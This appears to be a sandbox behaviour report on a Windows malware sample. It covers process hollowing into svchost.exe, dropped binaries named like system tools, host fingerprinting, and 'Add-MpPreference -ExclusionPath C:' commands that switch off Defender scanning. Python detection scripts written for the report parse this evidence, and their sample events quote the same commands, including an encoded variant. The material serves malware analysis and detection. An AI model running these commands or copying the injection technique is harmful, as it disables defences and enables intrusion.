                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe Code function: 0_2_00410B94 __snwprintf,FindFirstFileW,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_00410B94
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDA97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_000001C3DDDA97F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_009135CC FindFirstFileA,FindNextFileA,FindClose,8_2_009135CC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_00931C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,8_2_00931C54
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_008C5BCC GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,8_2_008C5BCC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: w32tm.exe, 0000000B.00000002.1594404005.0000000000558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                    Source: svchost.exe, 00000004.00000002.2571150204.000001C3DC413000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@vI
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000004.00000002.2571381752.000001C3DC497000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
                    Source: svchost.exe, 00000004.00000002.2571334687.000001C3DC475000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000002.1323038047.000000000072E000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564009802.00000000005A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000004.00000002.2571177550.000001C3DC467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API call chain: ExitProcess graph end node graph_0-12240
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API call chain: ExitProcess graph end node graph_0-12333
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API call chain: ExitProcess graph end node graph_0-12330
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API call chain: ExitProcess graph end node graph_0-12324
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API call chain: ExitProcess graph end node graph_0-12321
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API call chain: ExitProcess graph end node graph_0-12342
                    Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node graph_4-17558
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe API call chain: ExitProcess graph end node graph_8-53758
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe API call chain: ExitProcess graph end node graph_8-54252
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDD0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001C3DDDD0E94
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDBDE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDBDE00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe Code function: 0_2_0040BCA0 WaitForSingleObject,GetLocalTime,SystemTimeToFileTime,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,GetFileAttributesW,SHFileOperationW,Sleep,LocalFree,__snwprintf,GetWindowsDirectoryW,__snwprintf,CreateProcessW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,LoadLibraryW,GetProcAddress,GetProcAddress,CloseHandle,CloseHandle,TerminateProcess,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,0_2_0040BCA0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_00939204 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,8_2_00939204
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDD0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001C3DDDD0E94
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDCE5B8 SetUnhandledExceptionFilter,4_2_000001C3DDDCE5B8
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDCC5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001C3DDDCC5E0
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDCA818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001C3DDDCA818
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_0092C280 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0092C280
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_0092C540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0092C540
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_00929924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00929924
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Code function: 8_2_00929B18 SetUnhandledExceptionFilter,8_2_00929B18

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exe | File created: w32tm.exe.4.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_00406DB0 GetCurrentProcess,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1404038C1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1400026B1
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140248445
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x140400FD6
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x14025216A
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x14025B23F
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140225E38
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x140232AC0
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x1402A1C00
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x140166C45
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140236AB8
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x1402391CE
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140239FF3
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x1402412BC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x14030333E
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x140406550
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1403036D3
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140168DD1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x1402E8A85
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1403EFCD3
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x1404200BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: read write
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: read write
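The evidence lines above carry two things worth pulling out mechanically: the API sequence in function 0_2_00406DB0 (a new process is created, sections are created and mapped into it, its main thread's context is rewritten and the thread resumed, which is the injection the report's signatures describe), and the "Direct from" call sites, which the sandbox reports because the syscall instruction executed from an address inside the dropped binary's own image rather than from ntdll.dll. The parser below is an added example, not part of Joe Sandbox or of this report. It handles the lines as they were extracted here, where the process path runs straight into the next table cell and link text such as "Jump to behavior" trails the value, as well as a pipe-separated form; SAMPLE_LINES are constructed copies of lines from this page, and the finding names are the example's own.

```python
"""Parser for Joe Sandbox evidence lines (added example; not Joe Sandbox code).
SAMPLE_LINES are constructed copies of lines from this page, in both the raw
extracted form ("...tzutil.exeNtProtectVirtualMemory: ...Jump to behavior")
and a pipe-separated form."""
import re
from collections import defaultdict

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_00406DB0 GetCurrentProcess,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0",
    r"Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1404038C1Jump to behavior",
    r"Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x140400FD6",
    r"Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140248445Jump to behavior",
]

# process path, optional " | ", then either an API chain bracketed by its
# function id, or a "<Nt syscall>: Direct from: <addr>" record
_LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*"
    r"(?:Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<chain>.+?),(?P=fid)"
    r"|(?P<syscall>Nt\w+):\s*Direct from:\s*(?P<addr>0x[0-9A-Fa-f]+))"
    r"\s*(?:Jump to behavior)?\s*$"
)

# API combinations that the behaviours in this section rest on
HOLLOWING_MARKERS = {"CreateProcessW", "NtMapViewOfSection", "WriteProcessMemory",
                     "SetThreadContext", "ResumeThread"}
ENUM_MARKERS = {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW", "StrCmpIW"}


def parse_line(line):
    """Return a dict for one evidence line, or None if it is not a line we understand."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {"process": m.group("proc")}
    if m.group("fid"):
        rec.update(kind="api_chain", function=m.group("fid"),
                   chain=m.group("chain").split(","))
    else:
        # the call site of the syscall instruction; the report flags it because
        # the site is not inside ntdll.dll (direct or indirect syscall)
        rec.update(kind="direct_syscall", syscall=m.group("syscall"),
                   call_site=int(m.group("addr"), 16))
    return rec


def findings_for_chain(chain):
    """Map an API call sequence to the behaviours it evidences."""
    apis = set(chain)
    out = []
    if HOLLOWING_MARKERS <= apis:
        # new process, sections mapped into it, thread context rewritten, thread resumed
        out.append("remote_section_map_and_thread_hijack")
    if ENUM_MARKERS <= apis:
        # snapshot of all processes, each name compared case-insensitively
        out.append("process_name_search")
    return out


def summarize(lines=SAMPLE_LINES):
    """Group evidence per process: API chains, direct-syscall sites, derived findings."""
    per_proc = defaultdict(lambda: {"api_chains": [], "direct_syscalls": defaultdict(list),
                                    "findings": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_proc[rec["process"]]
        if rec["kind"] == "api_chain":
            entry["api_chains"].append(rec["function"])
            entry["findings"].update(findings_for_chain(rec["chain"]))
        else:
            entry["direct_syscalls"][rec["syscall"]].append(rec["call_site"])
            entry["findings"].add("syscall_not_via_ntdll_export")
    return {
        proc: {"api_chains": e["api_chains"],
               "direct_syscalls": dict(e["direct_syscalls"]),
               "findings": sorted(e["findings"])}
        for proc, e in per_proc.items()
    }


if __name__ == "__main__":
    for proc, info in summarize().items():
        print(proc)
        print("  findings:", ", ".join(info["findings"]))
        for name, sites in info["direct_syscalls"].items():
            print(f"  {name}: " + ", ".join(hex(s) for s in sites))
```

Every "Direct from" address for tzutil.exe and w32tm.exe sits in the 0x140000000 range, the usual preferred image base of a 64-bit PE, which is consistent with the syscall stubs living in the dropped binaries rather than in ntdll.dll.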
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004044A0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004044A0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA42E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDA42E0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA43D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDA43D0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDAA3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,4_2_000001C3DDDAA3B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
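The process chain in this section is what a detection engineer would key on: the sample spawns cmd.exe, which spawns powershell.exe to add the whole C: drive as a Windows Defender exclusion; the dropped tzutil.exe, running from a GUID-named folder under C:\ProgramData rather than from System32, does the same directly; and the injected svchost.exe runs a set.bat dropped under the user's Temp folder. The script below is an added example, not part of this report or of Joe Sandbox, and runs those checks over constructed process-creation events shaped like Sysmon Event ID 1 records (Image, CommandLine, ParentImage). The base64 -EncodedCommand variant and the benign tzutil.exe control event are constructed for the example; they do not appear in the report.

```python
"""Detection checks over constructed process-creation events (added example;
not Joe Sandbox or report code). The events mirror the chain in this section:
sample -> cmd.exe -> powershell.exe Add-MpPreference, tzutil.exe under
C:\\ProgramData\\{GUID}\\, cmd.exe /c set.bat from the user's Temp folder."""
import base64
import binascii
import ntpath
import re

SYSTEM_BINARIES = {"svchost.exe", "tzutil.exe", "w32tm.exe"}   # names this sample abuses
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# constructed: the same cmdlet hidden behind -EncodedCommand (UTF-16LE, base64)
_ENC = base64.b64encode("Add-MpPreference -ExclusionPath C:\\".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Add-MpPreference -ExclusionPath 'C:'",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe",
     "CommandLine": r"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -EncodedCommand {_ENC}",   # constructed variant
     "ParentImage": r"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" ""',
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\tzutil.exe",   # constructed benign control: the real tzutil
     "CommandLine": "tzutil.exe /g",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_EXCL_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(event):
    """Return the names of the checks that fire on one event, in check order."""
    hits = []
    image, cmd = event["Image"], event["CommandLine"]
    name, directory = ntpath.basename(image).lower(), ntpath.dirname(image).lower()
    parent = event["ParentImage"]
    parent_name, parent_dir = ntpath.basename(parent).lower(), ntpath.dirname(parent).lower()

    # 1. a Defender exclusion being added, plain or hidden behind -EncodedCommand
    decoded = decode_encoded_command(cmd)
    effective = decoded if decoded is not None else cmd
    if _EXCL_RE.search(effective):
        hits.append("defender_exclusion_added")
        if decoded is not None:
            hits.append("encoded_mppreference_cmdlet")

    # 2. a system binary name running from a directory it does not belong in
    if name in SYSTEM_BINARIES and directory not in LEGIT_DIRS:
        hits.append("system_process_name_unexpected_location")

    # 3. cmd.exe running a batch file from the user's Temp folder
    if name == "cmd.exe" and re.search(r"\\appdata\\local\\temp\\.*\.bat", cmd, re.IGNORECASE):
        hits.append("batch_from_user_temp")

    # 4. the parent itself is a masqueraded system binary
    if parent_name in SYSTEM_BINARIES and parent_dir not in LEGIT_DIRS:
        hits.append("parent_masquerades_system_binary")
    return hits


def run(events=SAMPLE_EVENTS):
    """Classify every event; returns (image name, hits) pairs in input order."""
    return [(ntpath.basename(e["Image"]), classify(e)) for e in events]


if __name__ == "__main__":
    for image, hits in run():
        print(f"{image:16} {', '.join(hits) or '-'}")
```

The control event shows why the location check compares the directory rather than the file name alone: the genuine C:\Windows\System32\tzutil.exe produces no hit, while the copy under C:\ProgramData\{GUID}\ does, and so does anything it spawns.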
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0040CF50 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,0_2_0040CF50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0041D480 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0041D480
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: GetLocaleInfoA,8_2_0092E5E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (each of the following paths was queried repeatedly across the powershell.exe instances):
  C:\
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
  C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
  C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
  C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_00407FE0 __snwprintf,RegCreateKeyExW,RegCloseKey,GetSystemTime,SystemTimeToFileTime,0_2_00407FE0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDC5AD0 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,RtlGetVersion,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,4_2_000001C3DDDC5AD0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0092D80C _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0092D80C
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDCF6DC HeapCreate,GetVersion,HeapSetInformation,4_2_000001C3DDDCF6DC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE
